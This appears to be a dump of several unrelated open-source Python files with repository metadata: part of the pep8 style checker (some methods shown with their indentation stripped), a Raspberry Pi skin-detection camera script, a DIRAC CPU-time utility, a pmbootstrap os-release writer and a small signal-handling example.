        self.multiline = False    # in a multiline string?
        self.hang_closing = options.hang_closing
        self.verbose = options.verbose
        self.filename = filename
        # Dictionary where a checker can store its custom state.
        self._checker_states = {}
        if filename is None:
            self.filename = 'stdin'
            self.lines = lines or []
        elif filename == '-':
            self.filename = 'stdin'
            self.lines = stdin_get_value().splitlines(True)
        elif lines is None:
            try:
                self.lines = readlines(filename)
            except IOError:
                # Remember the failure; it is reported later as E902.
                (exc_type, exc) = sys.exc_info()[:2]
                self._io_error = '%s: %s' % (exc_type.__name__, exc)
                self.lines = []
        else:
            self.lines = lines
        if self.lines:
            ord0 = ord(self.lines[0][0])
            if ord0 in (0xef, 0xfeff):  # Strip the UTF-8 BOM
                if ord0 == 0xfeff:
                    # Already-decoded BOM codepoint: drop one character.
                    self.lines[0] = self.lines[0][1:]
                elif self.lines[0][:3] == '\xef\xbb\xbf':
                    # Undecoded 3-byte UTF-8 BOM sequence: drop all three.
                    self.lines[0] = self.lines[0][3:]
        self.report = report or options.report
        self.report_error = self.report.error
    def report_invalid_syntax(self):
        """Check if the syntax is valid."""
        # Must be called from an active except block: the position is taken
        # from the in-flight exception's args when available.
        (exc_type, exc) = sys.exc_info()[:2]
        if len(exc.args) > 1:
            offset = exc.args[1]
            if len(offset) > 2:
                # SyntaxError args carry (filename, lineno, offset, text);
                # keep only (lineno, offset).
                offset = offset[1:3]
        else:
            offset = (1, 0)
        self.report_error(offset[0], offset[1] or 0,
                          'E901 %s: %s' % (exc_type.__name__, exc.args[0]),
                          self.report_invalid_syntax)
def readline(self):
"""Get the next line from the input buffer."""
if self.line_number >= self.total_lines:
return ''
line = self.lines[self.line_number]
self.line_number += 1
if self.indent_char is None and line[:1] in WHITESPACE:
self.indent_char = line[0]
return line
def run_check(self, check, argument_names):
"""Run a check plugin."""
arguments = []
for name in argument_names:
arguments.append(getattr(self, name))
return check(*arguments)
def init_checker_state(self, name, argument_names):
""" Prepares a custom state for the specific checker plugin."""
if 'checker_state' in argument_names:
self.checker_state = self._checker_states.setdefault(name, {})
def check_physical(self, line):
"""Run all physical checks on a raw input line."""
self.physical_line = line
for name, check, argument_names in self._physical_checks:
self.init_checker_state(name, argument_names)
result = self.run_check(check, argument_names)
if result is not None:
(offset, text) = result
self.report_error(self.line_number, offset, text, check)
if text[:4] == 'E101':
self.indent_char = line[0]
    def build_tokens_line(self):
        """Build a logical line from tokens.

        Returns the mapping of (logical line offset, token start position)
        pairs, or None when the line holds no significant token.
        """
        logical = []
        comments = []
        length = 0
        prev_row = prev_col = mapping = None
        for token_type, text, start, end, line in self.tokens:
            if token_type in SKIP_TOKENS:
                continue
            if not mapping:
                # First significant token anchors the logical line.
                mapping = [(0, start)]
            if token_type == tokenize.COMMENT:
                comments.append(text)
                continue
            if token_type == tokenize.STRING:
                # Hide string contents so later checks cannot match inside
                # literals.
                text = mute_string(text)
            if prev_row:
                (start_row, start_col) = start
                if prev_row != start_row:    # different row
                    prev_text = self.lines[prev_row - 1][prev_col - 1]
                    # Join rows with a single space unless the neighbors
                    # are brackets that glue together.
                    if prev_text == ',' or (prev_text not in '{[('
                                            and text not in '}])'):
                        text = ' ' + text
                elif prev_col != start_col:  # different column
                    # Preserve the intra-line gap verbatim.
                    text = line[prev_col:start_col] + text
            logical.append(text)
            length += len(text)
            mapping.append((length, end))
            (prev_row, prev_col) = end
        self.logical_line = ''.join(logical)
        # A "# noqa" anywhere in the comments disables checks for this line.
        self.noqa = comments and noqa(''.join(comments))
        return mapping
    def check_logical(self):
        """Build a line from tokens and run all logical checks on it."""
        self.report.increment_logical_line()
        mapping = self.build_tokens_line()
        if not mapping:
            return
        (start_row, start_col) = mapping[0][1]
        start_line = self.lines[start_row - 1]
        self.indent_level = expand_indent(start_line[:start_col])
        if self.blank_before < self.blank_lines:
            self.blank_before = self.blank_lines
        if self.verbose >= 2:
            print(self.logical_line[:80].rstrip())
        for name, check, argument_names in self._logical_checks:
            if self.verbose >= 4:
                print(' ' + name)
            self.init_checker_state(name, argument_names)
            for offset, text in self.run_check(check, argument_names) or ():
                if not isinstance(offset, tuple):
                    # Translate a logical-line offset into a (row, col)
                    # position using the token mapping.
                    for token_offset, pos in mapping:
                        if offset <= token_offset:
                            break
                    offset = (pos[0], pos[1] + offset - token_offset)
                self.report_error(offset[0], offset[1], text, check)
        if self.logical_line:
            # Remember context for the indentation checks on the next line.
            self.previous_indent_level = self.indent_level
            self.previous_logical = self.logical_line
        self.blank_lines = 0
        self.tokens = []
def check_ast(self):
"""Build the file's AST and run all AST checks."""
try:
tree = compile(''.join(self.lines), '', 'exec', PyCF_ONLY_AST)
except (SyntaxError, TypeError):
return self.report_invalid_syntax()
for name, cls, __ in self._ast_checks:
checker = cls(tree, self.filename)
for lineno, offset, text, check in checker.run():
if not self.lines or not noqa(self.lines[lineno - 1]):
self.report_error(lineno, offset, text, check)
def generate_tokens(self):
"""Tokenize the file, run physical line checks and yield tokens."""
if self._io_error:
self.report_error(1, 0, 'E902 %s' % self._io_error, readlines)
tokengen = tokenize.generate_tokens(self.readline)
try:
for token in tokengen:
if token[2][0] > self.total_lines:
return
self.maybe_check_physical(token)
yield token
except (SyntaxError, tokenize.TokenError):
self.report_invalid_syntax()
    def maybe_check_physical(self, token):
        """If appropriate (based on token), check current physical line(s).

        Called once per token from generate_tokens(); only newline-like
        tokens and multiline strings trigger physical checks.
        """
        # Called after every token, but act only on end of line.
        if _is_eol_token(token):
            # Obviously, a newline token ends a single physical line.
            self.check_physical(token[4])
        elif token[0] == tokenize.STRING and '\n' in token[1]:
            # Less obviously, a string that contains newlines is a
            # multiline string, either triple-quoted or with internal
            # newlines backslash-escaped. Check every physical line in the
            # string *except* for the last one: its newline is outside of
            # the multiline string, so we consider it a regular physical
            # line, and will check it like any other physical line.
            #
            # Subtleties:
            # - we don't *completely* ignore the last line; if it contains
            #   the magical "# noqa" comment, we disable all physical
            #   checks for the entire multiline string
            # - have to wind self.line_number back because initially it
            #   points to the last line of the string, and we want
            #   check_physical() to give accurate feedback
            if noqa(token[4]):
                return
            # self.multiline tells physical checks they are inside a
            # multiline string for the duration of this loop.
            self.multiline = True
            self.line_number = token[2][0]
            for line in token[1].split('\n')[:-1]:
                self.check_physical(line + '\n')
                self.line_number += 1
            self.multiline = False
    def check_all(self, expected=None, line_offset=0):
        """Run all checks on the input file.

        Drives AST checks first, then streams tokens, firing logical-line
        checks at statement boundaries.  Returns the per-file error count
        from the report.
        """
        self.report.init_file(self.filename, self.lines, expected, line_offset)
        self.total_lines = len(self.lines)
        if self._ast_checks:
            self.check_ast()
        # Reset per-file tokenizer/checker state.
        self.line_number = 0
        self.indent_char = None
        self.indent_level = self.previous_indent_level = 0
        self.previous_logical = ''
        self.tokens = []
        self.blank_lines = self.blank_before = 0
        # Open-bracket depth: a NEWLINE inside brackets is NL, not a
        # statement end, so logical checks only fire when parens == 0.
        parens = 0
        for token in self.generate_tokens():
            self.tokens.append(token)
            token_type, text = token[0:2]
            if self.verbose >= 3:
                if token[2][0] == token[3][0]:
                    pos = '[%s:%s]' % (token[2][1] or '', token[3][1])
                else:
                    pos = 'l.%s' % token[3][0]
                print('l.%s\t%s\t%s\t%r' %
                    (token[2][0], pos, tokenize.tok_name[token[0]], text))
            if token_type == tokenize.OP:
                if text in '([{':
                    parens += 1
                elif text in '}])':
                    parens -= 1
            elif not parens:
                if token_type in NEWLINE:
                    if token_type == tokenize.NEWLINE:
                        # End of a real statement: run logical checks.
                        self.check_logical()
                        self.blank_before = 0
                    elif len(self.tokens) == 1:
                        # The physical line contains only this token.
                        self.blank_lines += 1
                        del self.tokens[0]
                    else:
                        self.check_logical()
                elif COMMENT_WITH_NL and token_type == tokenize.COMMENT:
                    if len(self.tokens) == 1:
                        # The comment also ends a physical line.  This works
                        # around a tokenizer quirk (no NL after a trailing
                        # comment line in some Python versions): synthesize
                        # a well-terminated token and check it now.
                        token = list(token)
                        token[1] = text.rstrip('\r\n')
                        token[3] = (token[2][0], token[2][1] + len(token[1]))
                        self.tokens = [tuple(token)]
                        self.check_logical()
        if self.tokens:
            # Flush any trailing tokens (file not ending in a newline).
            self.check_physical(self.lines[-1])
            self.check_logical()
        return self.report.get_file_results()
class BaseReport(object):
    """Accumulate the results of the checks.

    Keeps per-code counters, the first message text seen for each code,
    and per-file / overall error totals.
    """

    # Subclasses flip this so error() prints each file name once,
    # before its first reported error.
    print_filename = False

    def __init__(self, options):
        self._benchmark_keys = options.benchmark_keys
        self._ignore_code = options.ignore_code
        # Aggregated results.
        self.elapsed = 0
        self.total_errors = 0
        self.counters = {key: 0 for key in self._benchmark_keys}
        self.messages = {}

    def start(self):
        """Start the timer."""
        self._start_time = time.time()

    def stop(self):
        """Stop the timer and record the elapsed wall-clock time."""
        self.elapsed = time.time() - self._start_time

    def init_file(self, filename, lines, expected, line_offset):
        """Signal a new file."""
        self.filename = filename
        self.lines = lines
        self.expected = expected or ()
        self.line_offset = line_offset
        self.file_errors = 0
        self.counters['files'] += 1
        self.counters['physical lines'] += len(lines)

    def increment_logical_line(self):
        """Signal a new logical line."""
        self.counters['logical lines'] += 1

    def error(self, line_number, offset, text, check):
        """Record one error; return its code, or None when ignored."""
        code = text[:4]
        if self._ignore_code(code):
            return
        try:
            self.counters[code] += 1
        except KeyError:
            # First occurrence of this code: create its counter and
            # remember the message text (the part after the code).
            self.counters[code] = 1
            self.messages[code] = text[5:]
        # Expected errors/warnings are counted but never reported.
        if code in self.expected:
            return
        if self.print_filename and not self.file_errors:
            print(self.filename)
        self.file_errors += 1
        self.total_errors += 1
        return code

    def get_file_results(self):
        """Return the count of errors and warnings for this file."""
        return self.file_errors

    def get_count(self, prefix=''):
        """Return the total count of errors and warnings."""
        return sum(self.counters[code]
                   for code in self.messages if code.startswith(prefix))

    def get_statistics(self, prefix=''):
        """Get statistics for message codes that start with the prefix.

        prefix='' matches all errors and warnings
        prefix='E' matches all errors
        prefix='W' matches all warnings
        prefix='E4' matches all errors that have to do with imports
        """
        stats = []
        for code in sorted(self.messages):
            if code.startswith(prefix):
                stats.append('%-7s %s %s' %
                             (self.counters[code], code, self.messages[code]))
        return stats

    def print_statistics(self, prefix=''):
        """Print overall statistics (number of errors and warnings)."""
        for line in self.get_statistics(prefix):
            print(line)

    def print_benchmark(self):
        """Print benchmark numbers."""
        print('%-7.2f %s' % (self.elapsed, 'seconds elapsed'))
        if not self.elapsed:
            return
        for key in self._benchmark_keys:
            print('%-7d %s per second (%d total)' %
                  (self.counters[key] / self.elapsed, key,
                   self.counters[key]))
class FileReport(BaseReport):
    """Collect the results of the checks and print only the filenames."""
    # Flips the BaseReport flag so error() prints each file name once,
    # before its first reported error; no per-error output is added.
    print_filename = True
class StandardReport(BaseReport):
    """Collect and print the results of the checks.

    Errors are deferred per file and printed sorted by position when the
    file is finished, using the configured report format.
    """

    def __init__(self, options):
        super(StandardReport, self).__init__(options)
        # A named format ("default", "pylint") resolves through
        # REPORT_FORMAT; anything else is used as a custom format string.
        self._fmt = REPORT_FORMAT.get(options.format.lower(),
                                      options.format)
        self._repeat = options.repeat
        self._show_source = options.show_source
        self._show_pep8 = options.show_pep8

    def init_file(self, filename, lines, expected, line_offset):
        """Signal a new file."""
        self._deferred_print = []
        return super(StandardReport, self).init_file(
            filename, lines, expected, line_offset)

    def error(self, line_number, offset, text, check):
        """Report an error, according to options."""
        code = super(StandardReport, self).error(
            line_number, offset, text, check)
        # Defer printing; without --repeat only the first occurrence of
        # each code is shown.
        if code and (self._repeat or self.counters[code] == 1):
            self._deferred_print.append(
                (line_number, offset, code, text[5:], check.__doc__))
        return code

    def get_file_results(self):
        """Print the result and return the overall count for this file."""
        self._deferred_print.sort()
        for line_number, offset, code, text, doc in self._deferred_print:
            values = {
                'path': self.filename,
                'row': self.line_offset + line_number,
                'col': offset + 1,
                'code': code,
                'text': text,
            }
            print(self._fmt % values)
            if self._show_source:
                # Guard against positions past the end of the file.
                if line_number > len(self.lines):
                    line = ''
                else:
                    line = self.lines[line_number - 1]
                print(line.rstrip())
                # Caret marker under the offending column.
                print(re.sub(r'\S', ' ', line[:offset]) + '^')
            if self._show_pep8 and doc:
                print(' ' + doc.strip())
        return self.file_errors
class DiffReport(StandardReport):
    """Collect and print the results for the changed lines only."""

    def __init__(self, options):
        super(DiffReport, self).__init__(options)
        # Mapping of filename -> line numbers present in the unified diff.
        self._selected = options.selected_lines

    def error(self, line_number, offset, text, check):
        # Report only errors located on lines touched by the diff.
        if line_number in self._selected[self.filename]:
            return super(DiffReport, self).error(
                line_number, offset, text, check)
        return None
class StyleGuide(object):
    """Initialize a PEP-8 instance with few options.

    Facade over the checker machinery: resolves options (from kwargs,
    config files and/or the command line), selects a reporter, and runs
    checks over files or directories.
    """

    def __init__(self, *args, **kwargs):
        # build options from the command line
        self.checker_class = kwargs.pop('checker_class', Checker)
        parse_argv = kwargs.pop('parse_argv', False)
        config_file = kwargs.pop('config_file', None)
        parser = kwargs.pop('parser', None)
        # build options from dict
        options_dict = dict(*args, **kwargs)
        # When not parsing argv, 'paths' given as an option seeds arglist.
        arglist = None if parse_argv else options_dict.get('paths', None)
        options, self.paths = process_options(
            arglist, parse_argv, config_file, parser)
        if options_dict:
            # Explicit keyword options override anything parsed above.
            options.__dict__.update(options_dict)
            if 'paths' in options_dict:
                self.paths = options_dict['paths']
        self.runner = self.input_file
        self.options = options
        if not options.reporter:
            options.reporter = BaseReport if options.quiet else StandardReport
        options.select = tuple(options.select or ())
        if not (options.select or options.ignore or
                options.testsuite or options.doctest) and DEFAULT_IGNORE:
            # The default choice: ignore controversial checks
            options.ignore = tuple(DEFAULT_IGNORE.split(','))
        else:
            # Ignore all checks which are not explicitly selected
            options.ignore = ('',) if options.select else tuple(options.ignore)
        options.benchmark_keys = BENCHMARK_KEYS[:]
        options.ignore_code = self.ignore_code
        options.physical_checks = self.get_checks('physical_line')
        options.logical_checks = self.get_checks('logical_line')
        options.ast_checks = self.get_checks('tree')
        self.init_report()

    def init_report(self, reporter=None):
        """Initialize the report instance."""
        self.options.report = (reporter or self.options.reporter)(self.options)
        return self.options.report

    def check_files(self, paths=None):
        """Run all checks on the paths.

        Returns the report object; Ctrl-C stops checking but still
        produces a (partial) report.
        """
        if paths is None:
            paths = self.paths
        report = self.options.report
        runner = self.runner
        report.start()
        try:
            for path in paths:
                if os.path.isdir(path):
                    self.input_dir(path)
                elif not self.excluded(path):
                    runner(path)
        except KeyboardInterrupt:
            print('... stopped')
        report.stop()
        return report

    def input_file(self, filename, lines=None, expected=None, line_offset=0):
        """Run all checks on a Python source file.

        Returns the per-file error count from the checker.
        """
        if self.options.verbose:
            print('checking %s' % filename)
        fchecker = self.checker_class(
            filename, lines=lines, options=self.options)
        return fchecker.check_all(expected=expected, line_offset=line_offset)

    def input_dir(self, dirname):
        """Check all files in this directory and all subdirectories."""
        dirname = dirname.rstrip('/')
        if self.excluded(dirname):
            return 0
        counters = self.options.report.counters
        verbose = self.options.verbose
        filepatterns = self.options.filename
        runner = self.runner
        for root, dirs, files in os.walk(dirname):
            if verbose:
                print('directory ' + root)
            counters['directories'] += 1
            # Iterate a sorted copy so removing from 'dirs' (which prunes
            # os.walk's descent) is safe during iteration.
            for subdir in sorted(dirs):
                if self.excluded(subdir, root):
                    dirs.remove(subdir)
            for filename in sorted(files):
                # contain a pattern that matches?
                if ((filename_match(filename, filepatterns) and
                     not self.excluded(filename, root))):
                    runner(os.path.join(root, filename))

    def excluded(self, filename, parent=None):
        """Check if the file should be excluded.
        Check if 'options.exclude' contains a pattern that matches filename.
        """
        if not self.options.exclude:
            return False
        basename = os.path.basename(filename)
        if filename_match(basename, self.options.exclude):
            return True
        if parent:
            filename = os.path.join(parent, filename)
        # Also match against the absolute path so directory patterns work.
        filename = os.path.abspath(filename)
        return filename_match(filename, self.options.exclude)

    def ignore_code(self, code):
        """Check if the error code should be ignored.
        If 'options.select' contains a prefix of the error code,
        return False.  Else, if 'options.ignore' contains a prefix of
        the error code, return True.
        """
        # Short prefixes (e.g. 'E1') that could still match a selected
        # code are never ignored outright.
        if len(code) < 4 and any(s.startswith(code)
                                 for s in self.options.select):
            return False
        return (code.startswith(self.options.ignore) and
                not code.startswith(self.options.select))

    def get_checks(self, argument_name):
        """Get all the checks for this category.
        Find all globally visible functions where the first argument name
        starts with argument_name and which contain selected tests.
        """
        checks = []
        for check, attrs in _checks[argument_name].items():
            (codes, args) = attrs
            # Keep a check if at least one of its codes is not ignored
            # (a falsy code means "always run").
            if any(not (code and self.ignore_code(code)) for code in codes):
                checks.append((check.__name__, check, args))
        return sorted(checks)
def get_parser(prog='pep8', version=__version__):
    """Create and return the OptionParser with all pep8 options.

    The parser's config_options attribute lists the option names that may
    also be set from a configuration file (see read_config).
    """
    parser = OptionParser(prog=prog, version=version,
                          usage="%prog [options] input ...")
    # Options that are also honoured when found in tox.ini / setup.cfg.
    parser.config_options = [
        'exclude', 'filename', 'select', 'ignore', 'max-line-length',
        'hang-closing', 'count', 'format', 'quiet', 'show-pep8',
        'show-source', 'statistics', 'verbose']
    parser.add_option('-v', '--verbose', default=0, action='count',
                      help="print status messages, or debug with -vv")
    parser.add_option('-q', '--quiet', default=0, action='count',
                      help="report only file names, or nothing with -qq")
    # --repeat is obsolete (it is the default); --first disables it by
    # storing False into the same 'repeat' destination.
    parser.add_option('-r', '--repeat', default=True, action='store_true',
                      help="(obsolete) show all occurrences of the same error")
    parser.add_option('--first', action='store_false', dest='repeat',
                      help="show first occurrence of each error")
    parser.add_option('--exclude', metavar='patterns', default=DEFAULT_EXCLUDE,
                      help="exclude files or directories which match these "
                           "comma separated patterns (default: %default)")
    parser.add_option('--filename', metavar='patterns', default='*.py',
                      help="when parsing directories, only check filenames "
                           "matching these comma separated patterns "
                           "(default: %default)")
    parser.add_option('--select', metavar='errors', default='',
                      help="select errors and warnings (e.g. E,W6)")
    parser.add_option('--ignore', metavar='errors', default='',
                      help="skip errors and warnings (e.g. E4,W) "
                           "(default: %s)" % DEFAULT_IGNORE)
    parser.add_option('--show-source', action='store_true',
                      help="show source code for each error")
    parser.add_option('--show-pep8', action='store_true',
                      help="show text of PEP 8 for each error "
                           "(implies --first)")
    parser.add_option('--statistics', action='store_true',
                      help="count errors and warnings")
    parser.add_option('--count', action='store_true',
                      help="print total number of errors and warnings "
                           "to standard error and set exit code to 1 if "
                           "total is not null")
    parser.add_option('--max-line-length', type='int', metavar='n',
                      default=MAX_LINE_LENGTH,
                      help="set maximum allowed line length "
                           "(default: %default)")
    parser.add_option('--hang-closing', action='store_true',
                      help="hang closing bracket instead of matching "
                           "indentation of opening bracket's line")
    parser.add_option('--format', metavar='format', default='default',
                      help="set the error format [default|pylint|<custom>]")
    parser.add_option('--diff', action='store_true',
                      help="report only lines changed according to the "
                           "unified diff received on STDIN")
    # Testing options are only exposed when running from a source checkout
    # that contains the test suite.
    group = parser.add_option_group("Testing Options")
    if os.path.exists(TESTSUITE_PATH):
        group.add_option('--testsuite', metavar='dir',
                         help="run regression tests from dir")
        group.add_option('--doctest', action='store_true',
                         help="run doctest on myself")
    group.add_option('--benchmark', action='store_true',
                     help="measure processing speed")
    return parser
def read_config(options, args, arglist, parser):
    """Read both user configuration and local configuration.

    Precedence (lowest to highest): parser defaults, config-file values,
    command-line arguments.  Returns the merged options object.
    """
    config = RawConfigParser()
    user_conf = options.config
    if user_conf and os.path.isfile(user_conf):
        if options.verbose:
            print('user configuration: %s' % user_conf)
        config.read(user_conf)
    local_dir = os.curdir
    # Walk up from the common prefix of the checked paths looking for a
    # project config file (tox.ini / setup.cfg, per PROJECT_CONFIG).
    parent = tail = args and os.path.abspath(os.path.commonprefix(args))
    while tail:
        if config.read([os.path.join(parent, fn) for fn in PROJECT_CONFIG]):
            local_dir = parent
            if options.verbose:
                print('local configuration: in %s' % parent)
            break
        (parent, tail) = os.path.split(parent)
    pep8_section = parser.prog
    if config.has_section(pep8_section):
        # Map each option's destination name to its type (or action, for
        # booleans) so config values can be coerced correctly.
        option_list = dict([(o.dest, o.type or o.action)
                            for o in parser.option_list])
        # First, read the default values
        (new_options, __) = parser.parse_args([])
        # Second, parse the configuration
        for opt in config.options(pep8_section):
            if opt.replace('_', '-') not in parser.config_options:
                print(" unknown option '%s' ignored" % opt)
                continue
            if options.verbose > 1:
                print(" %s = %s" % (opt, config.get(pep8_section, opt)))
            normalized_opt = opt.replace('-', '_')
            opt_type = option_list[normalized_opt]
            if opt_type in ('int', 'count'):
                value = config.getint(pep8_section, opt)
            elif opt_type == 'string':
                value = config.get(pep8_section, opt)
                if normalized_opt == 'exclude':
                    # Exclude patterns are resolved relative to the
                    # directory the config file was found in.
                    value = normalize_paths(value, local_dir)
            else:
                assert opt_type in ('store_true', 'store_false')
                value = config.getboolean(pep8_section, opt)
            setattr(new_options, normalized_opt, value)
        # Third, overwrite with the command-line options
        (options, __) = parser.parse_args(arglist, values=new_options)
    # Testing switches are never taken from configuration files.
    options.doctest = options.testsuite = False
    return options
def process_options(arglist=None, parse_argv=False, config_file=None,
                    parser=None):
    """Process options passed either via arglist or via command line args.

    Returns (options, args) where args is the list of paths to check.
    """
    if not parser:
        parser = get_parser()
    if not parser.has_option('--config'):
        # config_file=True means "use the default user config location".
        if config_file is True:
            config_file = DEFAULT_CONFIG
        group = parser.add_option_group("Configuration", description=(
            "The project options are read from the [%s] section of the "
            "tox.ini file or the setup.cfg file located in any parent folder "
            "of the path(s) being processed. Allowed options are: %s." %
            (parser.prog, ', '.join(parser.config_options))))
        group.add_option('--config', metavar='path', default=config_file,
                         help="user config file location (default: %default)")
    # Don't read the command line if the module is used as a library.
    if not arglist and not parse_argv:
        arglist = []
    # If parse_argv is True and arglist is None, arguments are
    # parsed from the command line (sys.argv)
    (options, args) = parser.parse_args(arglist)
    options.reporter = None
    # ensure_value guards against parsers that lack the testing options.
    if options.ensure_value('testsuite', False):
        args.append(options.testsuite)
    elif not options.ensure_value('doctest', False):
        if parse_argv and not args:
            # Default to checking the current directory when a project
            # config file is present or --diff is used.
            if options.diff or any(os.path.exists(name)
                                   for name in PROJECT_CONFIG):
                args = ['.']
            else:
                parser.error('input not specified')
        options = read_config(options, args, arglist, parser)
    options.reporter = parse_argv and options.quiet == 1 and FileReport
    # Normalize comma-separated option strings into lists.
    options.filename = options.filename and options.filename.split(',')
    options.exclude = normalize_paths(options.exclude)
    options.select = options.select and options.select.split(',')
    options.ignore = options.ignore and options.ignore.split(',')
    if options.diff:
        options.reporter = DiffReport
        stdin = stdin_get_value()
        options.selected_lines = parse_udiff(stdin, options.filename, args[0])
        # In diff mode the files to check come from the diff itself.
        args = sorted(options.selected_lines)
    return options, args
def _main():
    """Parse options and run checks on Python source.

    Exits with status 1 when any error or warning was reported.
    """
    import signal
    # Handle "Broken pipe" gracefully
    try:
        signal.signal(signal.SIGPIPE, lambda signum, frame: sys.exit(1))
    except AttributeError:
        pass    # not supported on Windows
    pep8style = StyleGuide(parse_argv=True, config_file=True)
    options = pep8style.options
    if options.doctest or options.testsuite:
        # Deferred import: the test suite only exists in a source checkout.
        from testsuite.support import run_tests
        report = run_tests(pep8style)
    else:
        report = pep8style.check_files()
    if options.statistics:
        report.print_statistics()
    if options.benchmark:
        report.print_benchmark()
    if options.testsuite and not options.quiet:
        report.print_results()
    if report.total_errors:
        if options.count:
            sys.stderr.write(str(report.total_errors) + '\n')
        sys.exit(1)
# Allow running this module directly as a script.
if __name__ == '__main__':
    _main()
|
alexfalcucc/anaconda
|
anaconda_lib/linting/pep8.py
|
Python
|
gpl-3.0
| 79,405
|
#!/usr/bin/python
# Skin-detection demo for the Raspberry Pi camera: each frame is
# converted to the YCrCb color space, thresholded against a fixed
# skin-tone range, and the original image is shown side by side with
# the skin-masked result.  Press 'q' to quit.
# import the necessary packages
from picamera.array import PiRGBArray
from picamera import PiCamera
import argparse
import datetime
import imutils
import time
import cv2
import numpy as np
# construct the argument parser and parse the arguments
# NOTE(review): --min-area is parsed but never used below — presumably a
# leftover from the motion-detection example this was adapted from.
ap = argparse.ArgumentParser()
ap.add_argument("-a", "--min-area", type=int, default=500, help="minimum area size")
args = vars(ap.parse_args())
# initialize the camera and grab a reference to the raw camera capture
camera = PiCamera()
camera.resolution = (320, 240)
camera.framerate = 32
rawCapture = PiRGBArray(camera, size=(320, 240))
# allow the camera to warmup
time.sleep(0.25)
# initialize the first frame in the video stream
firstFrame = None
# Skin-tone bounds in YCrCb channel order (Y, Cr, Cb).
lower = np.array([0, 133, 77], dtype="uint8")
upper = np.array([255, 173, 127], dtype="uint8")
# loop over the frames of the video
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
	# resize the frame, convert it to grayscale, and blur it
	image = frame.array
	#image = imutils.resize(image, width = 300)
	# NOTE(review): despite the name, hsvimg holds a YCrCb image
	# (COLOR_BGR2YCR_CB), matching the lower/upper bounds above.
	hsvimg = cv2.cvtColor(image, cv2.COLOR_BGR2YCR_CB)
	skinmask = cv2.inRange(hsvimg, lower, upper)
	# Clean up the binary mask: erode/dilate remove speckle noise,
	# then a Gaussian blur softens the mask edges.
	kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11,11))
	skinmask = cv2.erode(skinmask, kernel, iterations = 2)
	skinmask = cv2.dilate(skinmask, kernel, iterations = 2)
	skinmask = cv2.GaussianBlur(skinmask, (3,3), 0)
	skin = cv2.bitwise_and(image, image, mask = skinmask)
	# show the frame and record if the user presses a key
	cv2.imshow("images", np.hstack([image,skin]))
	key = cv2.waitKey(1) & 0xFF
	# clear the stream in preparation for the next frame
	rawCapture.truncate(0)
	# if the `q` key is pressed, break from the loop
	if key == ord("q"):
		break
# cleanup the camera and close any open windows
cv2.destroyAllWindows()
|
chiguire/lilibethsparade
|
opencv_tests/second_skin_detection.py
|
Python
|
gpl-3.0
| 1,816
|
#!/usr/bin/env python
########################################################################
# File : dirac-wms-get-queue-cpu-time.py
# Author : Federico Stagni
########################################################################
"""
Report CPU length of queue, in seconds
This script is used by the dirac-pilot script to set the CPUTime left, which is a limit for the matching
"""
import DIRAC
from DIRAC.Core.Base.Script import Script
@Script()
def main():
    """Print the CPU time left for the current queue, in seconds.

    The printed value is consumed by the dirac-pilot script to set the
    CPUTime limit used for job matching.
    """
    # -C lets the caller supply a known CPU normalization factor instead
    # of having it determined automatically.
    Script.registerSwitch("C:", "CPUNormalizationFactor=", "CPUNormalizationFactor, in case it is known")
    Script.parseCommandLine(ignoreErrors=True)
    CPUNormalizationFactor = 0.0
    for unprocSw in Script.getUnprocessedSwitches():
        if unprocSw[0] in ("C", "CPUNormalizationFactor"):
            CPUNormalizationFactor = float(unprocSw[1])
    # Deferred import: DIRAC modules must be imported after parseCommandLine.
    from DIRAC.WorkloadManagementSystem.Client.CPUNormalization import getCPUTime
    cpuTime = getCPUTime(CPUNormalizationFactor)
    # I hate this kind of output... PhC
    print("CPU time left determined as", cpuTime)
    DIRAC.exit(0)
if __name__ == "__main__":
    main()
|
DIRACGrid/DIRAC
|
src/DIRAC/WorkloadManagementSystem/scripts/dirac_wms_get_queue_cpu_time.py
|
Python
|
gpl-3.0
| 1,107
|
"""
Copyright 2018 Pablo Castellano
This file is part of pmbootstrap.
pmbootstrap is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
pmbootstrap is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with pmbootstrap. If not, see <http://www.gnu.org/licenses/>.
"""
import logging
import pmb.config
import pmb.helpers.git
def write_os_release(args, suffix):
    """Generate /etc/os-release inside the given chroot.

    :param args: pmbootstrap arguments object (args.work is the work dir)
    :param suffix: chroot suffix, e.g. "native" or "rootfs_<device>"
    """
    logging.info("(" + suffix + ") write /etc/os-release")
    # Current git revision of pmbootstrap, embedded in VERSION/PMOS_HASH.
    revision = pmb.helpers.git.rev_parse(args)
    # Write to /tmp inside the chroot first, then move into place as root,
    # since /etc in the chroot is not writable by the host user.
    filepath = args.work + "/chroot_" + suffix + "/tmp/os-release"
    os_release = ('PRETTY_NAME="postmarketOS {version}"\n'
                  'NAME="postmarketOS"\n'
                  'VERSION_ID="{version}"\n'
                  'VERSION="{version}-{hash:.8}"\n'
                  'ID="postmarketos"\n'
                  'ID_LIKE="alpine"\n'
                  'HOME_URL="https://www.postmarketos.org/"\n'
                  'SUPPORT_URL="https://github.com/postmarketOS/"\n'
                  'BUG_REPORT_URL="https://github.com/postmarketOS/"\n'
                  'PMOS_HASH="{hash}"\n'
                  ).format(version=pmb.config.version, hash=revision)
    with open(filepath, "w") as handle:
        handle.write(os_release)
    pmb.chroot.root(args, ["mv", "/tmp/os-release", "/etc/os-release"], suffix)
|
postmarketOS/pmbootstrap
|
pmb/install/file.py
|
Python
|
gpl-3.0
| 1,698
|
import signal
import os
import time
def receive_signal(signum, stack):
    """Signal handler: print the number of the received signal.

    Parameters follow the signal-handler contract: *signum* is the signal
    number, *stack* is the interrupted stack frame (unused).
    """
    # Bug fix: print() does not do %-interpolation. The original
    # print('Received: %s', signum) printed the literal format string
    # followed by the number ("Received: %s 10"); interpolate explicitly.
    print('Received: %s' % signum)
# Install the handler for both user-defined signals, then idle forever so
# the process can be signalled from another terminal (kill -USR1 <pid>).
signal.signal(signal.SIGUSR1, receive_signal)
signal.signal(signal.SIGUSR2, receive_signal)
# Bug fix: interpolate the PID instead of passing it as a second
# positional argument to print() (which printed the literal "%s").
print('My PID is: %s' % os.getpid())
while True:
    print('Waiting...')
    time.sleep(3)
|
davidam/python-examples
|
signals/signal_signal.py
|
Python
|
